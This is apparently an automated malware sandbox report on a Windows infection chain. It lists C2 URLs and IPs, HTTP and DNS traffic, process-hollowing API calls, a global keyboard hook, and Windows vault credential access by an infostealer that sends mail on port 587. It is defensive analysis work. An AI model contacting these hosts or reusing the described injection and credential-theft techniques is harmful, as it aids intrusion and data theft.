Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 015E7394h	13_2_015E7188
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 015E78DCh	13_2_015E7688
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	13_2_015E7E60
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 015E78DCh	13_2_015E7642
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 015E78DCh	13_2_015E767A
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	13_2_015E7E58

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://gxe0.com/yak/233_Wisrysxlfss

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02DAE4B8 InternetCheckConnectionA,

4_2_02DAE4B8

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 51.195.88.199:587

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 51.195.88.199 51.195.88.199

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 198.252.105.91:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49708
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:50629

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 51.195.88.199:587

Source: global traffic	HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: gxe0.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz

Source: powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.8
Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.le7
Source: neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.
Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s82.gocheapweb.com
Source: powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2212077156.0000000004791000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: x.exe, x.exe, 00000004.00000002.2209045342.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2191475072.0000000021E50000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2129637377.0000000000986000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054794048.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2192001973.0000000021FFF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2136598756.0000000002BF7000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000B.00000000.2121761760.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 00000019.00000002.2273295756.0000000002D22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001A.00000000.2241974953.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001D.00000002.2353180844.0000000002CB2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001E.00000000.2324372148.0000000000416000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.pmail.com
Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2383520732.00000000060D5000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539643971.0000000006430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2383520732.00000000060D5000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539643971.0000000006430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: neworigin.exe, 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 0000000E.00000002.2212077156.0000000004791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: neworigin.exe, 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.2212077156.00000000050ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2212077156.0000000004EE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: x.exe, 00000004.00000002.2126176510.0000000000932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/O
Source: x.exe, 00000004.00000002.2182528595.0000000020B7D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysx
Source: x.exe, 00000004.00000002.2182528595.0000000020B93000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B68000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
Source: x.exe, 00000004.00000002.2126176510.00000000008BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss&
Source: x.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfssexe
Source: x.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_WisrysxlfssyjHq
Source: powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown	HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49755 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: neworigin.exe.11.dr, cPKWk.cs

.Net Code: I3Mi2zn6x

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe

Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.0.neworigin.exe.6d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

.NET source code contains very large strings

Source: server_BTC.exe.11.dr, opqcmgIPmeabY.cs	Long String: Length: 17605
Source: TrojanAIbot.exe.13.dr, opqcmgIPmeabY.cs	Long String: Length: 17605

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA8670 NtUnmapViewOfSection,	4_2_02DA8670
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA8400 NtReadVirtualMemory,	4_2_02DA8400
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA7A2C NtAllocateVirtualMemory,	4_2_02DA7A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DADC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	4_2_02DADC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DADC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02DADC04
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA7D78 NtWriteVirtualMemory,	4_2_02DA7D78
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02DA8D70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	4_2_02DADD70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA7A2A NtAllocateVirtualMemory,	4_2_02DA7A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DADBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02DADBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02DA8D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 25_2_02CB8670 NtUnmapViewOfSection,	25_2_02CB8670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 25_2_02CB8400 NtReadVirtualMemory,	25_2_02CB8400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 25_2_02CB7A2C NtAllocateVirtualMemory,	25_2_02CB7A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 25_2_02CB7D78 NtWriteVirtualMemory,	25_2_02CB7D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 25_2_02CB8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	25_2_02CB8D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 25_2_02CBDD70 NtOpenFile,NtReadFile,NtClose,	25_2_02CBDD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 25_2_02CB86F7 NtUnmapViewOfSection,	25_2_02CB86F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 25_2_02CB7AC9 NtAllocateVirtualMemory,	25_2_02CB7AC9
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 25_2_02CB7A2A NtAllocateVirtualMemory,	25_2_02CB7A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 25_2_02CB8D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	25_2_02CB8D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C48670 NtUnmapViewOfSection,	29_2_02C48670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C48400 NtReadVirtualMemory,	29_2_02C48400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C47A2C NtAllocateVirtualMemory,	29_2_02C47A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C48D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	29_2_02C48D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C4DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	29_2_02C4DD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C47D78 NtWriteVirtualMemory,	29_2_02C47D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C47AC9 NtAllocateVirtualMemory,	29_2_02C47AC9
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C47A2A NtAllocateVirtualMemory,	29_2_02C47A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C4DBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	29_2_02C4DBB0
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C4DC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	29_2_02C4DC8C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C4DC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	29_2_02C4DC04
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 29_2_02C48D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	29_2_02C48D6E

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02DAF7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

4_2_02DAF7C8

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D920C4	4_2_02D920C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D9C977	4_2_02D9C977
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_028941C8	12_2_028941C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_0289EA80	12_2_0289EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_02894A98	12_2_02894A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_02893E80	12_2_02893E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_0289DF00	12_2_0289DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_0289DF00	12_2_0289DF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_0289A988	12_2_0289A988
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065B47CC	12_2_065B47CC
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065B67F1	12_2_065B67F1
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065B1F00	12_2_065B1F00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065B5AF9	12_2_065B5AF9
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065B5B08	12_2_065B5B08
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065C7E78	12_2_065C7E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065C66E8	12_2_065C66E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065C56B8	12_2_065C56B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065CC2A0	12_2_065CC2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065CB32A	12_2_065CB32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065C3178	12_2_065C3178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065C7798	12_2_065C7798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065CE4C0	12_2_065CE4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065C5DDF	12_2_065C5DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065C2350	12_2_065C2350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065C0040	12_2_065C0040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_065C0025	12_2_065C0025
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 13_2_015E85C8	13_2_015E85C8
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 13_2_015E85B7	13_2_015E85B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_06B5B490	14_2_06B5B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_06B5B470	14_2_06B5B470
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 18_2_05E43360	18_2_05E43360
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 22_2_014513D8	22_2_014513D8
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 25_2_02CA20C4	25_2_02CA20C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_027D41C8	27_2_027D41C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_027D4A98	27_2_027D4A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_027DEA80	27_2_027DEA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_027D3E80	27_2_027D3E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_027DDF00	27_2_027DDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_027DDF00	27_2_027DDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_027DA988	27_2_027DA988
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_027D0C8D	27_2_027D0C8D
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_027D0D58	27_2_027D0D58
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_06411F00	27_2_06411F00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 27_2_06427E78	27_2_06427E78
